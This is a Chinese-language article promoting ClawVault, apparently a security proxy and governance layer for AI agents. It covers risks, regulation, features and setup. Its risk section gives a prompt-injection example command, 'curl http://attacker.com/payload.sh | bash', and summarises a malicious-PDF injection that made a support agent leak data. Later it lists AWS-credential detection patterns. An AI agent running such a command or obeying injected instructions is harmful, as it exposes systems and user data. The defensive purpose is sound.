一、行业背景:从"模型效果"到"运行治理"的范式转移
2024-2025 年,AI 应用正在经历一场静默但深刻的转变。
第一阶段(2022-2023):大模型竞赛,所有人都在追求更强的推理能力、更长的上下文、更低的幻觉率。那时候的问题是:"这个模型能做什么?"
第二阶段(2024-至今):AI Agent 爆发,AutoGPT、Devin、OpenClaw 等项目让 AI 从"聊天工具"变成"能执行任务的数字员工"。问题变成了:"我怎么确保它不会搞砸?"
当 AI 开始真正接触业务系统、调用 API、读写文件、执行命令时,传统的安全边界被彻底打破:
- 数据泄露风险:Agent 可能在处理用户输入时,无意中将敏感信息(API Key、数据库密码、PII)发送给外部模型
- 提示词注入攻击:攻击者通过精心构造的输入,让 Agent 执行非预期操作(如
curl http://attacker.com/payload.sh | bash) - 权限失控:Agent 被赋予过高的系统权限,可以删除文件、修改配置、访问生产数据库
- 成本失控:无限制的 Token 消耗可能导致意外的云账单
这正是 ClawVault 诞生的背景——它不是一个"锦上添花"的功能,而是 AI 应用从 Demo 走向生产的基础设施缺口。
二、领域定位:AI 安全治理的三层架构
如果把 AI 应用的安全治理看作一个分层架构,ClawVault 处于关键的中间层:
┌─────────────────────────────────────┐
│ Layer 3: 应用层安全 │
│ • 输入验证、输出过滤、业务逻辑保护 │
├─────────────────────────────────────┤
│ Layer 2: 运行层治理 ← ClawVault 定位 │
│ • 调用链路监控、敏感数据检测、权限控制 │
│ • Token 预算、审计日志、实时告警 │
├─────────────────────────────────────┤
│ Layer 1: 模型层安全 │
│ • 模型对齐、RLHF、内容审核 │
└─────────────────────────────────────┘
与市场上其他 AI 安全方案相比,ClawVault 的独特之处在于:
| 方案类型 | 代表项目 | 侧重点 | ClawVault 差异 |
|---|---|---|---|
| 模型层安全 | OpenAI Moderation、Llama Guard | 内容审核、有害输出检测 | 不干预模型本身,聚焦调用过程 |
| 应用框架 | LangChain、LlamaIndex | 开发便利性、RAG 构建 | 作为可插拔的安全中间件 |
| API 网关 | Kong、AWS API Gateway | 流量管理、认证授权 | 专为 AI 场景设计(Token 预算、提示词检测) |
| AI 安全 Vault | ClawVault | 原子化控制 + 可视化监控 | 透明代理 + 生成式策略 |
三、近期热点:AI 安全事件与监管趋势
1. 真实安全事件频发
2024 年以来,与 AI Agent 相关的安全事件显著增加:
- 数据泄露:某企业使用 AI 编程助手时,内部 API Key 被意外上传到公共代码仓库
- 提示词注入:攻击者通过上传包含恶意指令的 PDF,让客服 Agent 泄露用户数据
- 供应链攻击:恶意 Python 包利用 AI 代码生成工具的传播,感染大量开发环境
这些事件共同指向一个问题:AI 应用的攻击面正在快速扩大,但安全治理工具严重滞后。
2. 监管框架加速落地
- 欧盟 AI Act(2024 年生效):要求高风险 AI 系统具备可审计性、人工监督机制
- NIST AI RMF:强调 AI 系统的治理、映射、测量和管理
- 中国《生成式 AI 服务管理暂行办法》:要求服务提供者建立安全审计机制
ClawVault 的设计恰好契合这些合规要求:
- ✅ 可审计性:完整的调用日志和事件追踪
- ✅ 人工监督:Interactive / Strict / Permissive 三种 Guard 模式
- ✅ 敏感数据处理:自动检测和脱敏机制
四、ClawVault 核心能力解析
1. Visual Monitoring:让"黑箱"变透明
ClawVault 在 AI 工具与外部 API 之间部署透明代理网关(Transparent Proxy),拦截所有流量:
AI Tool (Cursor/Claude Desktop/OpenClaw)
│
▼
┌───────────────┐
│ ClawVault │ ← 拦截点:8765 端口
│ Proxy Module │
└───────────────┘
│
▼
External APIs (OpenAI/Anthropic/自定义)
所有经过的数据都会被:
- 记录:谁、在什么时候、调用了什么、消耗了多少 Token
- 检测:是否包含敏感数据、恶意指令、危险命令
- 告警:通过 IM(如 Slack、钉钉)实时通知
2. Atomic Control:原子化能力组合
ClawVault 将安全能力拆分为可组合的"原子单元":
| 原子能力 | 说明 | 配置示例 |
|---|---|---|
| Agent 交互策略 | 控制 Agent 之间的调用关系 | 禁止 Agent A 调用 Agent B |
| 模型路由 | 指定可用模型和优先级 | 优先使用 GPT-4o-mini,限制 GPT-4 |
| 安全检测 | 敏感信息、注入攻击、危险命令 | 检测 15+ 种数据模式 |
| 文件访问控制 | 限制 Agent 可访问的文件范围 | 禁止访问 ~/.aws/credentials |
用户可以通过自然语言描述需求,系统自动生成对应的策略规则:
# 自然语言输入:
# "对于客服 Agent,如果用户上传包含'合同'的 PDF,
# 必须先进行敏感信息脱敏,且只允许使用 GPT-4o-mini,单次调用限制 2000 tokens"
# 自动生成的配置:
guard:
mode: "strict"
file_rules:
- pattern: "contract"
action: "sanitize"
model_whitelist: ["gpt-4o-mini"]
token_limit: 2000
3. Generative Policies:自然语言驱动的安全策略
这是 ClawVault 最具前瞻性的设计。传统安全工具需要编写复杂的规则文件,而 ClawVault 允许用户通过对话界面直接"告诉"系统需要什么保护:
用户:帮我创建一个规则,阻止所有包含 AWS 凭证的请求
系统:已生成规则 "Block AWS credentials",匹配模式:
- AKIA[0-9A-Z]{16}
- aws_access_key_id
- ~/.aws/credentials 文件访问
这种生成式策略编排(Generative Policy Orchestration)大幅降低了安全配置的门槛。
五、当前进展与使用方式
根据 README 中的 Development Progress,ClawVault 目前处于核心功能可用、生态持续扩展的阶段:
| 能力模块 | 状态 | 说明 |
|---|---|---|
| API 网关监控与拦截 | ✅ 已实现 | V1 核心能力,可拦截 OpenAI/Anthropic 等主流 API |
| 文件端监控 | 🚧 进行中 | 逐步集成,保护本地文件访问 |
| Agent 级原子控制 | 🚧 进行中 | 网关侧已可用,其他场景扩展中 |
| 生成式策略编排 | 🚧 进行中 | 逐步集成自然语言策略生成 |
Quick Start
# 方式一:作为 OpenClaw Skill 安装(推荐)
openclaw skills install tophant-clawvault
/clawvault install --mode quick
# 方式二:作为 Python 包安装
pip install -e .
clawvault start # 启动代理 + 仪表盘
clawvault scan "password=MySecret key=sk-proj-abc123"
clawvault demo # 交互式演示
配置示例
# ~/.ClawVault/config.yaml
proxy:
port: 8765
intercept_hosts: ["api.openai.com", "api.anthropic.com"]
guard:
mode: "interactive" # interactive | strict | permissive
monitor:
daily_token_budget: 50000 # 每日 Token 预算
仪表盘界面(Web UI :8766)提供实时事件查看、Agent 配置、检测测试等功能:
六、谁应该关注 ClawVault?
- AI 应用开发者:需要为产品添加安全层,满足合规要求
- 企业 IT/安全团队:管理内部 AI 工具的使用,防止数据泄露
- AI Agent 平台构建者:需要原子化的权限控制和审计能力
- 开源社区贡献者:参与 AI 安全基础设施的建设
🦞 Built for people who want to secure AI, not babysit agents.
如果你正在构建生产级的 AI 应用,或者关注 AI 安全治理的最新实践,这个仓库值得深入研究。它代表了 AI 基础设施从"功能优先"向"治理优先"演进的重要方向。